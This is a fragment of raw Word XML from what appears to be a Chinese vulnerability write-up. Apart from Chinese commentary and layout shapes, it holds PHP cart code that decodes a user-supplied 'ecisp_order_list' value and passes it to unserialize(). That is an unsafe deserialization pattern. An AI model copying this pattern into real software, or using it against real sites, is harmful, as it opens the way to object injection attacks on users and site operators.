          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>够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了，至于其他的地方不知道可不可以，我没有仔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>细</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>看。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="268" w:lineRule="auto"/>
        <w:jc w:val="both"/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  <w:lang w:eastAsia="zh-CN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7718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$cartid =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>$this-&gt;fun-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>eccode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$this-&gt;fun-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">accept('ecisp_order_l </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ist', 'C'), 'DECODE', db_pscode);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$cartid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stripslashes(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>htmlspecialchars_decode($cartid));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1224" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$uncartid </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>= !</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">empty($cartid) ? </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>unserialize(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$cartid) : 0;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($this-&gt;CON['order_ismember']) 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2105" w:firstLine="274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(!empty($this-&gt;ec_member_username_id)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&amp;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&amp;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> !</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>empty($this-&gt;ec_member_username)) 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3843" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rsMember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$this-&gt;get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>member(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>null,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$this-&gt;ec_member_username_id);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="957" w:right="882"/>
                    <w:jc w:val="center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$linkURL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$this-&gt;get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>link(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'memberlogin');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213" w:firstLine="914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callmessage(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;lng['memberloginerr '], $linkURL, $this-&gt;lng['memberlogin'], 1,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lng[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'member_regbotton'], 1,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mlink[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'reg']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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2012" w:right="-6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($uncartid &amp;&amp; is_array($uncartid)) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1076" w:right="639"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$didarray =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180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;fun-&gt;key_array_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>name(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$uncartid,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-69"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'did',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-69"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'amount', '[0-9]+', '[0-9]+');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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s7422" style="position:absolute;margin-left:80.45pt;margin-top:71.85pt;width:341.85pt;height:547.4pt;z-index:-364888;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1609,1437" coordsize="6837,10948">
            <v:rect id="_x0000_s7717" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7716" style="position:absolute;left:1797;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7715" style="position:absolute;left:2713;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7714" style="position:absolute;left:3629;top:1688;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7713" style="position:absolute;left:4545;top:1688;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7712" style="position:absolute;left:5509;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7711" style="position:absolute;left:5629;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7710" style="position:absolute;left:5750;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7709" style="position:absolute" from="1612,1442" to="8366,1442" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7708" style="position:absolute" from="1614,1440" to="1614,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7707" style="position:absolute" from="8364,1445" to="8364,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7706" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7705" style="position:absolute;left:1797;top:2014;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7704" style="position:absolute;left:8063;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7703" style="position:absolute" from="1614,1951" to="1614,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7702" style="position:absolute" from="8364,1951" to="8364,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7701" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7700" style="position:absolute;left:1797;top:2340;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7699" style="position:absolute" from="1614,2277" to="1614,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7698" style="position:absolute" from="8364,2277" to="8364,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7697" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7696" style="position:absolute;left:1797;top:2666;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7695" style="position:absolute;left:2713;top:2666;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7694" style="position:absolute;left:3629;top:2666;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7693" style="position:absolute;left:4545;top:2666;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7692" style="position:absolute;left:4786;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7691" style="position:absolute;left:4906;top:2666;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7690" style="position:absolute;left:7075;top:2666;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7689" style="position:absolute;left:7196;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7688" style="position:absolute" from="1614,2603" to="1614,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7687" style="position:absolute" from="8364,2603" to="8364,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7686" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7685" style="position:absolute;left:1797;top:2992;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7684" style="position:absolute;left:2713;top:2992;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7683" style="position:absolute;left:3629;top:2992;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7682" style="position:absolute;left:4545;top:2992;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7681" style="position:absolute;left:5461;top:2992;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7680" style="position:absolute;left:6545;top:2992;width:104;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7679" style="position:absolute;left:6649;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7678" style="position:absolute;left:6769;top:2992;width:104;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7677" style="position:absolute;left:6873;top:2992;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7676" style="position:absolute;left:7957;top:2992;width:104;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7675" style="position:absolute;left:8061;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7674" style="position:absolute;left:8182;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7673" style="position:absolute" from="1614,2929" to="1614,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7672" style="position:absolute" from="8364,2929" to="8364,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7671" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7670" style="position:absolute;left:1797;top:3318;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7669" style="position:absolute" from="1614,3255" to="1614,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7668" style="position:absolute" from="8364,3255" to="8364,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7667" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7666" style="position:absolute;left:1797;top:3644;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7665" style="position:absolute;left:2713;top:3644;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7664" style="position:absolute;left:3629;top:3644;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7663" style="position:absolute;left:4545;top:3644;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7662" style="position:absolute;left:5461;top:3644;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7661" style="position:absolute;left:6545;top:3644;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7660" style="position:absolute;left:6666;top:3644;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7659" style="position:absolute;left:6786;top:3644;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7658" style="position:absolute;left:6907;top:3644;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7657" style="position:absolute;left:8112;top:3644;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7656" style="position:absolute" from="1614,3581" to="1614,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7655" style="position:absolute" from="8364,3581" to="8364,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7654" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7653" style="position:absolute;left:1797;top:3970;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7652" style="position:absolute;left:2158;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7651" style="position:absolute;left:2263;top:3970;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7650" style="position:absolute;left:3348;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7649" style="position:absolute;left:3453;top:3970;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7648" style="position:absolute;left:3815;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7647" style="position:absolute;left:3920;top:3970;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7646" style="position:absolute;left:4281;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7645" style="position:absolute;left:4386;top:3970;width:1447;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7644" style="position:absolute;left:5833;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7643" style="position:absolute;left:5938;top:3970;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7642" style="position:absolute;left:6540;top:3970;width:106;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7641" style="position:absolute;left:6646;top:3970;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7640" style="position:absolute;left:6887;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7639" style="position:absolute;left:6992;top:3970;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7638" style="position:absolute;left:7353;top:3970;width:105;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7637" style="position:absolute;left:7458;top:3970;width:724;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7636" style="position:absolute" from="1614,3907" to="1614,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7635" style="position:absolute" from="8364,3907" to="8364,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7634" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7633" style="position:absolute;left:1797;top:4296;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7632" style="position:absolute;left:2713;top:4296;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7631" style="position:absolute;left:3629;top:4296;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7630" style="position:absolute;left:4545;top:4296;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7629" style="position:absolute;left:5461;top:4296;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7628" style="position:absolute;left:5943;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7627" style="position:absolute;left:6063;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7626" style="position:absolute;left:6184;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7625" style="position:absolute;left:6304;top:4296;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7624" style="position:absolute;left:7148;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7623" style="position:absolute;left:7268;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7622" style="position:absolute;left:7389;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7621" style="position:absolute;left:7509;top:4296;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7620" style="position:absolute;left:7991;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7619" style="position:absolute" from="1614,4233" to="1614,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7618" style="position:absolute" from="8364,4233" to="8364,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7617" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7616" style="position:absolute;left:1797;top:4622;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7615" style="position:absolute;left:2881;top:4622;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7614" style="position:absolute;left:3002;top:4622;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7613" style="position:absolute;left:3604;top:4622;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7612" style="position:absolute;left:3725;top:4622;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7611" style="position:absolute" from="1614,4559" to="1614,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7610" style="position:absolute" from="8364,4559" to="8364,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7609" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7608" style="position:absolute;left:1797;top:4948;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7607" style="position:absolute;left:2713;top:4948;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7606" style="position:absolute;left:3629;top:4948;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7605" style="position:absolute;left:4545;top:4948;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7604" style="position:absolute;left:5461;top:4948;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7603" style="position:absolute;left:5822;top:4948;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7602" style="position:absolute;left:5943;top:4948;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7601" style="position:absolute;left:6063;top:4948;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7600" style="position:absolute" from="1614,4885" to="1614,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7599" style="position:absolute" from="8364,4885" to="8364,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7598" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7597" style="position:absolute;left:1797;top:5274;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7596" style="position:absolute" from="1614,5211" to="1614,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7595" style="position:absolute" from="8364,5211" to="8364,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7594" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7593" style="position:absolute;left:1797;top:5600;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7592" style="position:absolute;left:2713;top:5600;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7591" style="position:absolute;left:3629;top:5600;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7590" style="position:absolute;left:4545;top:5600;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7589" style="position:absolute;left:5461;top:5600;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7588" style="position:absolute;left:7027;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7587" style="position:absolute;left:7148;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7586" style="position:absolute;left:7268;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7585" style="position:absolute;left:7389;top:5600;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7584" style="position:absolute" from="1614,5537" to="1614,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7583" style="position:absolute" from="8364,5537" to="8364,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7582" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7581" style="position:absolute;left:1797;top:5926;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7580" style="position:absolute;left:2713;top:5926;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7579" style="position:absolute;left:3629;top:5926;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7578" style="position:absolute;left:4545;top:5926;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7577" style="position:absolute;left:5461;top:5926;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7576" style="position:absolute;left:6063;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7575" style="position:absolute;left:6184;top:5926;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7574" style="position:absolute;left:7148;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7573" style="position:absolute;left:7268;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7572" style="position:absolute;left:7389;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7571" style="position:absolute" from="1614,5863" to="1614,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7570" style="position:absolute" from="8364,5863" to="8364,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7569" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7568" style="position:absolute;left:1797;top:6252;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7567" style="position:absolute;left:5171;top:6252;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7566" style="position:absolute;left:5291;top:6252;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7565" style="position:absolute" from="1614,6189" to="1614,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7564" style="position:absolute" from="8364,6189" to="8364,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7563" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7562" style="position:absolute;left:1797;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7561" style="position:absolute;left:2713;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7560" style="position:absolute;left:3629;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7559" style="position:absolute;left:4545;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7558" style="position:absolute;left:5461;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7557" style="position:absolute;left:6377;top:6578;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7556" style="position:absolute;left:7220;top:6578;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
